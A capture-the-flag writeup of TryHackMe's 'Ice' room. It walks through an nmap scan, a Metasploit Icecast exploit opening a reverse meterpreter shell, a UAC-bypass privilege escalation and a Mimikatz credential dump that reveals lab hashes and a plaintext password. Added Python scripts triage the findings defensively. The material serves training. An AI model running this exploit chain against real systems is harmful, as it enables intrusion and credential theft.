Introduction
This article is a writeup for TryHackMe.
The room is Ice, and its difficulty is Easy.
Ice follows the typical flow of an attack: it starts with reconnaissance, identifies a vulnerability in a discovered service, and then uses the Metasploit Framework to obtain administrator privileges.
This room teaches the basics of the Metasploit Framework.
The tasks from Connect onward are covered below.
Recon
We begin with reconnaissance.
For reconnaissance in general, see the earlier post "Content Discovery: Reconnaissance against Web Applications".
Port scan
Nmap is used to identify open ports.
Here the port scan is run through a shell script prepared in advance.
$ ./port_scan.sh <target host IP address>
##################
# Port scan tool #
##################
*Detailed scan :1
*Full scan :2
***Select scanning method by number***
1
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-16 23:08 JST
Nmap scan report for 10.10.137.216
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2023-05-16T14:10:19+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=Dark-PC
| Not valid before: 2023-05-15T14:04:37
|_Not valid after: 2023-11-14T14:04:37
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
8000/tcp open http Icecast streaming media server
|_http-title: Site doesn't have a title (text/html).
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Dark-PC
| NetBIOS computer name: DARK-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-05-16T09:10:12-05:00
| smb2-time:
| date: 2023-05-16T14:10:13
|_ start_date: 2023-05-16T14:04:35
|_nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 0267ab38d98d (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h15m00s, deviation: 2h30m00s, median: 0s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.63 seconds
Scan completed
The port scan shows Icecast running on port 8000.
This task can be answered from the scan results above.
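From a defender's point of view, the same scan output is a list of things to fix rather than things to exploit. The following Python script is an added example (not part of the original writeup or of the room) that parses the nmap text output above, extracts the open ports and flags the findings a practitioner would act on: the legacy Icecast service, SMB signing not being enforced, exposed RDP/SMB and the end-of-life operating system. The sample text is constructed from the scan shown on this page.

```python
import re
from typing import List, Tuple

# Constructed sample: the relevant lines of the nmap -sV output shown above
# (open-port rows plus the SMB host-script results).
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcp open http Icecast streaming media server
49152/tcp open msrpc Microsoft Windows RPC
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
"""

# One open-port row: "<port>/<proto> open <service> <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

# Severity ordering used to sort the report.
SEVERITY = {"HIGH": 0, "MEDIUM": 1, "LOW": 2}


def parse_open_ports(text: str) -> List[Tuple[int, str, str]]:
    """Return (port, service, version) for every open-port row in the scan."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            ports.append((int(m.group(1)), m.group(3), m.group(4).strip()))
    return ports


def triage(text: str) -> List[Tuple[str, str]]:
    """Turn scan facts into (severity, finding) pairs a defender would act on."""
    findings = []
    for port, _service, version in parse_open_ports(text):
        if "icecast" in version.lower():
            findings.append(("HIGH", f"{port}/tcp: Icecast exposed; the msfconsole search on this "
                             "page finds a header-overwrite exploit for old builds, so confirm the "
                             "version and patch or retire the service"))
        elif port == 3389:
            findings.append(("MEDIUM", "3389/tcp: RDP reachable from the scanner; restrict it to a "
                             "jump host or VPN and require Network Level Authentication"))
        elif port == 445:
            findings.append(("MEDIUM", "445/tcp: SMB reachable from the scanner; block it at the "
                             "perimeter unless file sharing is required"))
    low = text.lower()
    if "message signing enabled but not required" in low or "message_signing: disabled" in low:
        findings.append(("HIGH", "SMB signing is not enforced, which enables NTLM relay; require "
                         "signing via the 'Digitally sign communications (always)' policy"))
    if re.search(r"\bOS: Windows 7\b", text):
        findings.append(("HIGH", "Windows 7 is end of life and receives no security updates; "
                         "isolate or replace the host"))
    findings.sort(key=lambda f: SEVERITY[f[0]])
    return findings


if __name__ == "__main__":
    for severity, finding in triage(NMAP_OUTPUT):
        print(f"[{severity}] {finding}")
```

The rules are deliberately simple string and port matches; the point is that the two SMB script lines ("enabled but not required" and "message_signing: disabled") are what make the host relayable, and they are easy to miss in a long nmap report.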
Gain Access
After identifying the Icecast vulnerability, start msfconsole from the Metasploit Framework and search for an exploit.
Searching for an exploit
Run the following command to start msfconsole.
$ msfconsole
search Icecast
This command searches for exploits matching the target.
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/icecast_header
Run the following command to select the module.
use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/icecast_header) >
show options
Run this command to review the options and make the required settings.
Module options (exploit/windows/http/icecast_header):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 8000 yes The target port (TCP)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 1.2.3.4 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
exploit
Run this command to launch the exploit.
[*] Started reverse TCP handler on 1.2.3.4:4444
[*] Sending stage (175686 bytes) to 10.10.137.216
[*] Meterpreter session 1 opened (1.2.3.4:4444 -> 10.10.137.216:49194) at 2023-05-16 23:21:35 +0900
Escalate
To obtain administrator privileges, search for locally usable exploits and attempt privilege escalation.
Searching for local exploits
getuid
This command shows the current user.
Server username: Dark-PC\Dark
ps
This command shows which user is running the Icecast process.
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
416 4 smss.exe
500 692 svchost.exe
544 536 csrss.exe
588 692 svchost.exe
592 536 wininit.exe
604 584 csrss.exe
652 584 winlogon.exe
692 592 services.exe
700 592 lsass.exe
708 592 lsm.exe
816 692 svchost.exe
884 692 svchost.exe
932 692 svchost.exe
1060 692 svchost.exe
1192 692 svchost.exe
1260 692 TrustedInstaller.exe
1304 500 dwm.exe x64 1 Dark-PC\Dark C:\Windows\System32\dwm.exe
1320 1288 explorer.exe x64 1 Dark-PC\Dark C:\Windows\explorer.exe
1376 692 spoolsv.exe
1404 692 svchost.exe
1468 692 sppsvc.exe
1480 692 taskhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\taskhost.exe
1548 816 WmiPrvSE.exe
1568 692 amazon-ssm-agent.exe
1588 692 mscorsvw.exe
1652 692 LiteAgent.exe
1692 692 svchost.exe
1832 692 Ec2Config.exe
2008 692 vds.exe
2064 1588 mscorsvw.exe
2104 692 svchost.exe
2296 1320 Icecast2.exe x86 1 Dark-PC\Dark C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
2636 692 SearchIndexer.exe
2840 816 rundll32.exe x64 1 Dark-PC\Dark C:\Windows\System32\rundll32.exe
2884 2840 dinotify.exe x64 1 Dark-PC\Dark C:\Windows\System32\dinotify.exe
To search for locally usable exploits, run the run post/multi/recon/local_exploit_suggester command.
[*] 10.10.137.216 - Collecting local exploits for x86/windows...
[*] 10.10.137.216 - 174 exploit checks are being tried...
[+] 10.10.137.216 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.137.216 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.137.216 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.137.216 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.137.216 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.137.216 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.137.216 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.137.216 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[+] 10.10.137.216 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.10.137.216 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
3 exploit/windows/local/ms13_053_schlamperei Yes The target appears to be vulnerable.
4 exploit/windows/local/ms13_081_track_popup_menu Yes The target appears to be vulnerable.
5 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
6 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
7 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable.
8 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
9 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
10 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability.
11 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
12 exploit/windows/local/always_install_elevated No The target is not exploitable.
13 exploit/windows/local/anyconnect_lpe No The target is not exploitable. vpndownloader.exe not found on file system
14 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
15 exploit/windows/local/bthpan No The target is not exploitable.
16 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
17 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
18 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
19 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
20 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
21 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
22 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
23 exploit/windows/local/ikeext_service No The check raised an exception.
24 exploit/windows/local/ipass_launch_app No The check raised an exception.
25 exploit/windows/local/lenovo_systemupdate No The check raised an exception.
26 exploit/windows/local/lexmark_driver_privesc No The check raised an exception.
27 exploit/windows/local/mqac_write No The target is not exploitable.
28 exploit/windows/local/ms10_015_kitrap0d No The target is not exploitable.
29 exploit/windows/local/ms14_070_tcpip_ioctl No The target is not exploitable.
30 exploit/windows/local/ms15_004_tswbproxy No The target is not exploitable.
31 exploit/windows/local/ms16_016_webdav No The target is not exploitable.
32 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The target is not exploitable.
33 exploit/windows/local/ms16_075_reflection No The target is not exploitable.
34 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
35 exploit/windows/local/ms_ndproxy No The target is not exploitable.
36 exploit/windows/local/novell_client_nicm No The target is not exploitable.
37 exploit/windows/local/ntapphelpcachecontrol No The target is not exploitable.
38 exploit/windows/local/panda_psevents No The target is not exploitable.
39 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
40 exploit/windows/local/virtual_box_guest_additions No The target is not exploitable.
41 exploit/windows/local/webexec No The check raised an exception.
Let's look at the first entry, exploit/windows/local/bypassuac_eventvwr.
This module bypasses Windows UAC by hijacking a registry key under the current user's hive and inserting a custom command that is invoked when Windows Event Viewer starts.
The source code can be found in bypassuac_eventvwr.rb.
To escalate privileges, first move the current session to the background.
Background session 1? [y/N]
The current sessions can be listed with the sessions command.
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows Dark-PC\Dark @ DARK-PC 1.2.3.4:4444 -> 10.10.137.216:49221 (10.10.137.216)
use exploit/windows/local/bypassuac_eventvwr
Run this command to select the module.
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
A local exploit needs an existing session to run in.
Therefore run the set session 1 command.
session => 1
Confirm that lhost is correct, then execute run.
[*] Started reverse TCP handler on 1.2.3.4:4444
[*] Sending stage (175686 bytes) to 10.10.137.216
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[*] Meterpreter session 2 opened (1.2.3.4:4444 -> 10.10.137.216:49215) at 2023-05-16 23:54:58 +0900
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175686 bytes) to 10.10.137.216
[*] Meterpreter session 3 opened (1.2.3.4:4444 -> 10.10.137.216:49232) at 2023-05-16 23:55:08 +0900
[*] Cleaning up registry keys ...
After the escalation completes, run getprivs to confirm that the privileges have been expanded.
Enabled Process Privileges
==========================
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
Looting
In this task we learn how to gather additional credentials and crack hashes stored on the machine.
To interact with the lsass service, which provides authentication on Windows, we need to migrate into a process that has the required permissions.
Process migration
ps
Run this command and confirm which processes are running as NT AUTHORITY\SYSTEM.
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
500 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
544 536 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
588 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
592 536 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
600 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe
604 584 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
652 584 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
692 592 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
700 592 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
708 592 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
816 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
856 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe
884 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
932 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1060 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1192 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1304 500 dwm.exe x64 1 Dark-PC\Dark C:\Windows\System32\dwm.exe
1320 1288 explorer.exe x64 1 Dark-PC\Dark C:\Windows\explorer.exe
1376 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1404 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1468 692 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
1480 692 taskhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\taskhost.exe
1568 692 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1652 692 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe
1680 816 slui.exe x64 1 Dark-PC\Dark C:\Windows\System32\slui.exe
1692 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1832 692 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
2008 692 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe
2104 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2196 2296 cmd.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\cmd.exe
2260 2296 cmd.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\cmd.exe
2296 1320 Icecast2.exe x86 1 Dark-PC\Dark C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
2448 356 powershell.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe
2524 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe
2624 692 taskhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\taskhost.exe
2636 692 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
2840 816 rundll32.exe x64 1 Dark-PC\Dark C:\Windows\System32\rundll32.exe
2884 2840 dinotify.exe x64 1 Dark-PC\Dark C:\Windows\System32\dinotify.exe
3004 692 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
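The process list above also contains the evidence a defender would look for: two cmd.exe instances whose parent is Icecast2.exe (pid 2296) and a powershell.exe whose parent (pid 356) no longer exists. A streaming server has no business spawning shells, and an orphaned shell is typical of a payload whose launcher has exited. The following Python script is an added example (not part of the original writeup or of the room) that parses a meterpreter `ps` table and flags exactly those parent/child anomalies; the sample rows are constructed from the listing above and the "expected parent" sets are my assumptions for a workstation baseline.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample: a subset of the meterpreter `ps` listing shown above.
PS_OUTPUT = r"""
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
592 536 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
692 592 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
700 592 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
1320 1288 explorer.exe x64 1 Dark-PC\Dark C:\Windows\explorer.exe
1376 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
2196 2296 cmd.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\cmd.exe
2260 2296 cmd.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\cmd.exe
2296 1320 Icecast2.exe x86 1 Dark-PC\Dark C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
2448 356 powershell.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe
2524 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe
"""

# "<pid> <ppid> <name> [<arch> <session> [<user> <path>]]"; the name is matched
# lazily so that "[System Process]" and names followed by an arch both parse.
ROW_RE = re.compile(r"^(\d+)\s+(\d+)\s+(.+?)(?:\s+(x86|x64)\s+(\d+)(?:\s+(.*))?)?$")
# The "User Path" tail splits at the first drive-letter path.
USER_PATH_RE = re.compile(r"^(.*?)\s+([A-Za-z]:\\.*)$")

# Interactive shells, and the parents from which a user normally launches them
# (assumed baseline for a workstation; tune per environment).
SHELLS = {"cmd.exe", "powershell.exe"}
EXPECTED_SHELL_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    arch: Optional[str] = None
    session: Optional[int] = None
    user: Optional[str] = None
    path: Optional[str] = None


def parse_ps(text: str) -> List[Proc]:
    """Parse the meterpreter `ps` table into Proc records (header rows are skipped)."""
    procs = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        pid, ppid, name, arch, session, tail = m.groups()
        user = path = None
        if tail:
            up = USER_PATH_RE.match(tail)
            user, path = (up.group(1), up.group(2)) if up else (tail, None)
        procs.append(Proc(int(pid), int(ppid), name, arch,
                          int(session) if session else None, user, path))
    return procs


def find_suspicious_shells(procs: List[Proc]) -> List[Tuple[str, int, str]]:
    """Flag shells whose parent is not an interactive launcher, or has already exited."""
    by_pid: Dict[int, Proc] = {p.pid: p for p in procs}
    alerts = []
    for p in procs:
        if p.name.lower() not in SHELLS:
            continue
        parent = by_pid.get(p.ppid)
        if parent is None:
            alerts.append(("MEDIUM", p.pid,
                           f"{p.name} (pid {p.pid}) has no living parent (ppid {p.ppid}); "
                           "the launcher has exited, which is common for payload-spawned shells"))
        elif parent.name.lower() not in EXPECTED_SHELL_PARENTS:
            alerts.append(("HIGH", p.pid,
                           f"{p.name} (pid {p.pid}) was spawned by {parent.name} (pid {parent.pid}); "
                           "a network service launching a shell is a strong exploitation indicator"))
    return alerts


if __name__ == "__main__":
    for severity, pid, reason in find_suspicious_shells(parse_ps(PS_OUTPUT)):
        print(f"[{severity}] {reason}")
```

The same parent/child rule is what a Sysmon Event ID 1 or EDR process-creation query would express as "shell whose ParentImage is a service binary"; running it over a point-in-time `ps` snapshot is the forensic equivalent when no telemetry exists.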
migrate -N spoolsv.exe
Run this command to migrate into that process.
[*] Migrating from 2448 to 1376...
[*] Migration completed successfully.
getuid
Running this command confirms the privilege escalation.
Server username: NT AUTHORITY\SYSTEM
Mimikatz is a tool that can extract credentials such as passwords, NTLM hashes and Kerberos tickets from the memory of a Windows system.
load kiwi
Run this command to load the Mimikatz (kiwi) extension used for the dump.
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
creds_all
Running this command reveals the password.
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
Dark Dark-PC e52cac67419a9a22ecb08369099ed302 7c4fe5eada682714a036e39378362bab 0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
DARK-PC$ WORKGROUP (null)
Dark Dark-PC Password01!
tspkg credentials
=================
Username Domain Password
-------- ------ --------
Dark Dark-PC Password01!
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Dark Dark-PC Password01!
dark-pc$ WORKGROUP (null)
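What the dump above tells a defender is not just "the password is Password01!" but which credential providers were holding what: msv holds the NTLM hash (unavoidable for a logged-on user), while wdigest, tspkg and kerberos all held the plaintext, which on Windows 7 is the default WDigest caching behaviour. The following Python script is an added example (not part of the original writeup or of the room) that parses the creds_all output into a per-account exposure summary and maps it to the controls that would have limited it; the UseLogonCredential value and KB2871997 are real Microsoft settings, and the sample text is constructed from the dump shown above.

```python
import re
from typing import Dict, List

# Constructed sample: the creds_all output shown above (lab values from this room).
CREDS_OUTPUT = """
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
Dark Dark-PC e52cac67419a9a22ecb08369099ed302 7c4fe5eada682714a036e39378362bab 0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
DARK-PC$ WORKGROUP (null)
Dark Dark-PC Password01!
tspkg credentials
=================
Username Domain Password
-------- ------ --------
Dark Dark-PC Password01!
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Dark Dark-PC Password01!
dark-pc$ WORKGROUP (null)
"""

SECTION_RE = re.compile(r"^(\w+) credentials$")


def parse_sections(text: str) -> Dict[str, List[Dict[str, str]]]:
    """Return {provider: [row dict]}, using each section's own header line as keys."""
    sections: Dict[str, List[Dict[str, str]]] = {}
    provider, header = None, None
    for line in text.splitlines():
        line = line.strip()
        m = SECTION_RE.match(line)
        if m:
            provider, header = m.group(1), None
            sections[provider] = []
            continue
        if not line or provider is None or set(line) <= {"=", "-", " "}:
            continue  # blank lines and the ===/--- rulers
        if header is None:
            header = line.split()
            continue
        sections[provider].append(dict(zip(header, line.split())))
    return sections


def summarize_exposure(text: str) -> Dict[str, Dict[str, str]]:
    """For each real user account, record what each provider held: 'plaintext' or 'ntlm_hash'."""
    exposure: Dict[str, Dict[str, str]] = {}
    for provider, rows in parse_sections(text).items():
        for row in rows:
            user = row.get("Username", "(null)")
            if user == "(null)" or user.endswith("$"):
                continue  # empty rows and machine accounts
            if row.get("Password", "(null)") != "(null)":
                exposure.setdefault(user, {})[provider] = "plaintext"
            elif row.get("NTLM", "(null)") != "(null)":
                exposure.setdefault(user, {})[provider] = "ntlm_hash"
    return exposure


def recommend(exposure: Dict[str, Dict[str, str]]) -> List[str]:
    """Map what LSASS was holding to the controls that would have limited it."""
    advice: List[str] = []
    held = {kind for providers in exposure.values() for kind in providers.values()}
    plaintext = {prov for p in exposure.values() for prov, kind in p.items() if kind == "plaintext"}
    if exposure:
        advice.append("rotate the password of every listed account; treat it as compromised")
    if "wdigest" in plaintext:
        advice.append("WDigest cached the plaintext: set UseLogonCredential=0 under "
                      r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "
                      "(KB2871997 on Windows 7 / 2008 R2)")
    if plaintext - {"wdigest"}:
        advice.append("other providers (" + ", ".join(sorted(plaintext - {"wdigest"})) + ") also "
                      "held plaintext: protect LSASS (RunAsPPL on 8.1+, Credential Guard on 10+) "
                      "and keep privileged accounts off this tier")
    if "ntlm_hash" in held:
        advice.append("the NTLM hash is reusable for pass-the-hash: restrict NTLM and enforce SMB signing")
    return advice


if __name__ == "__main__":
    for account, providers in summarize_exposure(CREDS_OUTPUT).items():
        print(account, providers)
    for line in recommend(summarize_exposure(CREDS_OUTPUT)):
        print("-", line)
```

Machine accounts (names ending in $) and the (null) placeholder rows are filtered out so that the report lists only accounts whose password actually needs rotating; the provider names are taken from the section headers, so the parser works unchanged on dumps with more providers than this one.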
Post-Exploitation
help
This task can be answered with the help command.
Closing
That concludes the Ice writeup.
It is a good room for getting comfortable with msfconsole.
Basic usage of the Metasploit Framework is described in the earlier post "Understanding Vulnerabilities and Exploits".